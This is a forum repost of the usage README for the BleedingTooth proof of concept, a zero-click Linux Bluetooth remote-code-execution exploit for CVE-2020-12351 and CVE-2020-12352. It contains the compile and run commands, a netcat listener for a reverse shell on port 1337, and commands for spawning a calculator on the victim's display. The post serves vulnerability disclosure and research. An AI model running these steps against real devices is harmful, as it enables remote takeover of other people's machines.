Jump to content
Nytro

BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution

By Nytro, in Mobile security

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution

This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.

Technical details

Technical details about the exploit is available at writeup.md.

Usage

Compile it using: 

$ gcc -o exploit exploit.c -lbluetooth

and execute it as: 

$ sudo ./exploit target_mac source_ip source_port

In another terminal, run: 

$ nc -lvp 1337
exec bash -i 2>&0 1>&0

If successful, a calc can be spawned with: 

export XAUTHORITY=/run/user/1000/gdm/Xauthority
export DISPLAY=:0
gnome-calculator

This Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:

  • 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

The success rate of the exploit is estimated at 80%.

Credits

Andy Nguyen (theflow@)

 

Sursa; https://google.github.io/security-research/pocs/linux/bleedingtooth/

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...